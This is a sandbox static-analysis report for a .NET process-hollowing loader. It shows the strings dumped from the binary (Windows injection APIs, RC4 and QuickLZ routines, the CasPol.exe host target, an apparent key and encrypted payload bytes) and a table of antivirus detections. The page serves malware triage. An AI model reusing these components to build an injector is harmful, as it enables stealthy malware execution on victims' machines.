Static | ZeroBOX
No static analysis available.
!This program cannot be run in DOS mode.
`.rsrc
@.reloc
v4.0.30319
#Strings
QLZ_POINTERS_1
cbReserved2
lpReserved2
QLZ_POINTERS_3
<Module>
CREATE_SUSPENDED
UNCOMPRESSED_END
SW_HIDE
QLZ_MEMORY_SAFE
IMAGE_DOS_SIGNATURE
IMAGE_NT_SIGNATURE
PAGE_EXECUTE_READWRITE
MEM_RESERVE
CONTEXT_FULL
PrivateKeyM
UNCONDITIONAL_MATCHLEN
DEFAULT_HEADERLEN
CWORD_LEN
QLZ_VERSION_REVISION
STARTUPINFO
System.IO
QLZ_STREAMING_BUFFER
QLZ_VERSION_MAJOR
QLZ_VERSION_MINOR
STARTF_USESTDHANDLES
HASH_VALUES
MINOFFSET
MEM_COMMIT
GenerateIV
STARTF_USESHOWWINDOW
SW_SHOW
SafeQuickLZ
mscorlib
Generate_Enc_Dec
RC4EncDec
NtResumeThread
hThread
NtGetContextThread
NtSetContextThread
SizeCompressed
sizeCompressed
SizeDecompressed
sizeDecompressed
lpReserved
source
pImage
abIV_Table
compressible
pHandle
lpTitle
lpApplicationName
lpCommandLine
ValueType
flAllocationType
FastWrite
GuidAttribute
DebuggableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
AssemblyTrademarkAttribute
TargetFrameworkAttribute
dwFillAttribute
AssemblyFileVersionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
ProcessHollowingCsharp.exe
ProcessHollowingCsharp.cliqiba_r.exe
dwXSize
dwYSize
dwSize
System.Runtime.Versioning
String
get_Length
nBlockLength
HeaderLength
RC4Initial
kernel32.dll
ntdll.dll
GetManifestResourceStream
Program
System
lpNumberOfBytesWritten
abPlain
System.Reflection
ArgumentException
lpStartupInfo
lpProcessInfo
lpDesktop
ProcessHollowingCsharp
dwMemoryAddr
WriteHeader
exeBuffer
lpBuffer
hStdError
.cctor
IntPtr
System.Diagnostics
System.Runtime.InteropServices
System.Runtime.CompilerServices
DebuggingModes
bInheritHandles
lpThreadAttributes
lpProcessAttributes
numbytes
dwCreationFlags
dwFlags
get_Chars
dwXCountChars
dwYCountChars
CreateProcess
TerminateProcess
hProcess
hostProcess
lpBaseAddress
lpAddress
Compress
Decompress
Object
flProtect
VA2FileOffset
op_Explicit
lpEnvironment
uConst
hStdInput
hStdOutput
lpContext
wShowWindow
VirtualAllocEx
startIndex
GetUintFromBytearray
SetUintFromBytearray
GetUshortFromBytearray
strKey
GetExecutingAssembly
BlockCopy
NtWriteVirtualMemory
lpCurrentDirectory
WrapNonExceptionThrows
ProcessHollowingCsharp
Copyright
2022
$37b35cf4-e958-4b13-9dd9-1609a52c48fd
1.0.0.0
.NETFramework,Version=v4.0
FrameworkDisplayName
.NET Framework 4
Y'Y]<j
(&jt@0
cc&hzL
b*B~*;qV%C7]
|*1P](
f-g^*"Ny
u+kKmQ^h
k1dNoB
O-IoXmh-
/8l"8;
i$K{6)
:D6q_)?
0{=w1-3
5Q+gaq
*]$DHS
u1RiP
/94$CF
#i6Dw*
>c`Lx`
bU]xQ
G_Zrct
P684{T+
1Nk0F@
dL-M?S
%]u)tm
J/!$>$
gBeD}N
aUl((k
|dB'"A
aeN?<L
GN1CN:
[C6W<I
g"(OBA
LBFbQ.!
Jtk c)
B08B<`*i
/??<[X
$42^kO
W8&J;,$
?)ar3T
G,l&1@
&>h<+R
Ok0P>:
|@N4Y4
HH-d\}V=/"
lKZ-ij
!xI8}t
UrpJ"y
Jk`+Kw_
q![L|)g
Ym\g?N8
+,3Edg
hrH*\+
=o=wvx
[9xj/8{
,CN]VL
ndxC7tl
oF$#WX
L%-cFt
LG=KB/
w1d\-3;
k U*w(
5*.&%I
|S^m&
_,}!s2
O~2`f@L
N#LV9
%9{=_tW
iwyP5?
G*'`pu
Zr=c<[A$
8|wtEB2
#%rYM"
=3=q>K;
kAe2S8+
|T"W$5
G<jlka
7'C;UX=
R](F;iE
ozk"B|
GWYgdz:
6*W8EG
mtd&r#
F"-u@d[c
?J!8V^
|FO;Bo
a}F"H5|
Ti62qO
}HK*>_
{J|y;^?
eQh@$*
?]'j4U
q[ez?`;~
<_Mmww)_
pc89bt
E;.BDA
;y-$%)`
Y.X,Ka
=z'Nm*b(
c:xhu>j'
9s7%mU
1q54WX'h}M=
'iU=@^
+|r\c{
,+;;%T!
m6%}}}
Z!lNH*
SuO|c*n9
:k'^iU
_/Bjd}
$}?S(Y
?':76N
$d>zeK
dH81=&
CXDeEK
omv+OP
A3lX\x
*9Z4-EF6
}4p6Se
!9HSn"
M7+$R`
j(t'f#
"1X*<r
c_<CIg
{jdBX-
f}):]U
Y%V@jG
ry1yYQ*
$I|-q[
m 5r9$
e)6X*FK
[`4-=~.
ZR;qv^
Q:_4~Y
rFr@"\cn
b^-uS]
b}%Rr?W
=0"xYj
Y<$`Zh
B*/`gv
04.wNNi
Hakg9M
MV.tA
iA,ug2
-k)pYq
,&WeCv
)l8~s'u
I~R1WN
_H1l~C
uh8)L<
l,9X\
WdwD"1
t@|CJ!_
7mOdV6
k5)r)1d j
&?q\?"
\R4`Ox
)&Fwc
aBPA83D
D3CH.N
{u]C7E\<
t&Qv4y
JtJ//G
!24Z[4!
>&W%Od
gR]xmF
xi2 (d
3B! _o7
HF\.(j
F(@.]B
pnj}hO
QH_'/K:_
zW^p?3
r!LV]m
/[T$UH
U]|S|95
Ugr7tO
VXQ_Vd
|TTAbC
FxgRqPe
=B}P%$
-=ek`,M
46}CZ|
-Fm<I8C
"\;:n
{nIPc]H
j=r2qhG
Pp$PkX
EmMK{
W>1-VK
w#L;<~(>
L;|2(F
jo>k2/
}Mzqwi
I)_;&d
\V'XClx
u*ejde
xv`A2-A
%_p[58"
ZG_8QF
JxZ)oG#
[XP-rZ
mvYf`m
59V+:I
791KP\
b?+HjF
L{?Lsr>PW
@G1)~L
LnSy~(
%@)n|VM5
Gmjd>|
W@zKK2F?
~Xy=4|
V,w?<a
Lz#%O\?uo
n(P!L&
:l)U~%TW
K'`UbH1
t4NQPK
KaY?o
puiV`8
ei=|_@2
g[-WCo
%HJ22"
,\?CD!u
m_=49W
+h\Ol6
yEH_s`M_
S0R)m
FPZ4yj
ul#Lo)z
g$!5;(
-SjX Z
MQ218@
!1z8(g&
JQM="n
0-Bd!Y
0]YYvi
axh/C
U9%7'@
l>W{_Kg,
NN.:geTQh
'J,p_c
X%TM5u
^L}Q^(
|gNDfn4
ud / Wi
DTfE+^l
?ScI&R
iUq50w
9<Airf+?D
8"Hn[S
up?KUr
Z2P?[$t~
)TUr/~&
W$vVyJgkLa
0a?XWG
-Dr~}!R
L`,K<y
Xcv;\bD)
+%bq%v
pU|xFh
ht-qUL
z9i5B4l
@ZZk\,B
@$N0u^L
f!,@'m
AdwCnt
cjm"5p
]75nV5I5
%}#A1X
mmD>:N
#[ypNM
A&bA%A
]A\+P1
JAoH{N
LQV}jN
mbbsE
cTC MCj
v E1@|
e&4-]a
xNB-Nk
W_/5[^
-<e1va
F9rG+x
$]8PSX
8y@ u[R
MNsxc7
<3Ar_[
=@EH~#r!
Bs1&[lK
8v4PSp
r#{>$:
E=US6_
K^`|ue
tICnfs
:DziG
)eXR?z
9""j/o
Q&"A%|'mq
HR4Y<-
nl/Gm_
7ZUP}2
XKZ}V:G
:9EG0
f'~E3lT
7$rPtV
jjLR{t
mEU>Qj\
(8G[bg
PF ^FZ
I`:z`|
5 3pqp
pyaNex
,<x;cI
argE4H
lp|mdT
>$(Qq:
-DbKte^z
KQD#Ev
%t}fvu
H/`;70
B3rVf9lg|
r>BTzVin
J!|7Lp@
Q\xcm7
4'Yv>rmZ
E4\!4
2\ G(eZ8r
$DZ!^;QVn
x"x7U/8
d{vgkG
jGq2+p
o*VV}6
vh07<R(
sG-a/,
yhb-g6
TuG* X
^xZr`;
w^LqmM
Q<c|Pf
=npNg|
O/-fo`S
@bOXq5
)48 cg
n=[.=x
6Vn2)*
FOrQ&0|"E
*|8 nA
"G0+-j
9sV^F&V;d
O#[_/C
\Di#p3
?,9Dk4
cQ\pO$]t%
Iz9h-F
l-]1l*)
qd}l=vKk
~{obM>+f`3t
PeYffR
q"2}QH
DCw6pT
edY`-q8&
R]".}L
)3&h(33
sw57l=
L7tkr=
R4-N%)/
49Tfs/7l
Z$9I@
XU?q?:
NB9cOI
??A#T]
;3L^hfW#
l#_w|$
{0CiX3
SM|)%
J8B>~\o
|6]o{hP
3f _`f
av"bl,
,Y+1x;~S8QB"7u
.2x!c
RY#]o.z\
Ny{5H]r
j4cbn9
`+-#\IF
m+U^r@
(U]:~
(#e^][
Rzx5u*
f"w"JR
n~HFIt#
O:\work\VirusAttack\ProcessHollowingCsharp\ProcessHollowingCsharp\obj\x86\Release\ProcessHollowingCsharp.pdb
_CorExeMain
mscoree.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
ProcessHollowingCsharp.cliqiba_r.exe
/3489-sd*f/-*g/fd*b/89fg8b2f-g/g-*fhk ynuy8,ui1,j@h62k9jfghj#+hj-f*hj/k9m45fh96f6%94h+9s7f4gh!s8/h/h-*-/j9j87*7hmn84ytmn7yt-ty*n*n/yrkjyulop*told*f-a/sdfs*io-lu*ilo*-i]*[-*opi[;l*uiliu;op'i*o-l-o*l;dfs+dfdgju* uk*iuds*d-fsdf+sdfsd+fhgt*ju*-o98o98-*p09*9*08;9*08lo8,*.*,.o.**,ertyhsrgh*-fgagfa+sfasqwfeffsdfsdfsdsvdvfvar/g*fvvw*-34*34g23g*45+erg+ga+dfgas+fag2hgadfgag*ag*-g*4g*45t56*h*65hggagargsgg-*dfgfdg*-fgfgfg+dgfdfgd*d*ga+f*a-sdf*sdf*-saAF2AFGSgfg*GDGGFbgddfgsgfdffdf+gdfgdgdg+dfgsdgsd+sdsgfa*-gs+ggf+ff+ffdg
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
CompanyName
FileDescription
ProcessHollowingCsharp
FileVersion
1.0.0.0
InternalName
ProcessHollowingCsharp.exe
LegalCopyright
Copyright
2022
LegalTrademarks
OriginalFilename
ProcessHollowingCsharp.exe
ProductName
ProcessHollowingCsharp
ProductVersion
1.0.0.0
Assembly Version
1.0.0.0
| Antivirus | Signature |
|---|---|
| Bkav | Clean |
| Lionic | Clean |
| MicroWorld-eScan | Gen:Heur.Bodegun.1 |
| ClamAV | Clean |
| CMC | Clean |
| CAT-QuickHeal | Clean |
| ALYac | Clean |
| Malwarebytes | Clean |
| VIPRE | Gen:Heur.Bodegun.1 |
| Sangfor | Clean |
| K7AntiVirus | Clean |
| K7GW | Clean |
| Baidu | Clean |
| VirIT | Clean |
| Cyren | Clean |
| Symantec | Trojan Horse |
| ESET-NOD32 | Clean |
| TrendMicro-HouseCall | Clean |
| Avast | Clean |
| Cynet | Clean |
| Kaspersky | Clean |
| BitDefender | Gen:Heur.Bodegun.1 |
| NANO-Antivirus | Clean |
| SUPERAntiSpyware | Clean |
| Ad-Aware | Clean |
| Sophos | Clean |
| F-Secure | Clean |
| DrWeb | Trojan.DownLoader45.49744 |
| Zillya | Clean |
| TrendMicro | Clean |
| McAfee-GW-Edition | Clean |
| FireEye | Gen:Heur.Bodegun.1 |
| Emsisoft | Gen:Heur.Bodegun.1 (B) |
| Ikarus | Gen.Bodegun |
| Jiangmin | Clean |
| Avira | Clean |
| Antiy-AVL | Clean |
| Kingsoft | Clean |
| Microsoft | Clean |
| Gridinsoft | Clean |
| Xcitium | Clean |
| Arcabit | Trojan.Bodegun.1 |
| ViRobot | Clean |
| GData | Gen:Heur.Bodegun.1 |
| Google | Clean |
| AhnLab-V3 | Clean |
| Acronis | Clean |
| McAfee | Clean |
| MAX | malware (ai score=80) |
| VBA32 | Clean |
| Zoner | Clean |
| Rising | Clean |
| Yandex | Clean |
| TACHYON | Clean |
| MaxSecure | Clean |
| Fortinet | Clean |
| BitDefenderTheta | Gen:NN.ZemsilF.36196.om0@aC!vepl |
| AVG | Clean |
| Panda | Clean |
No IRMA results available.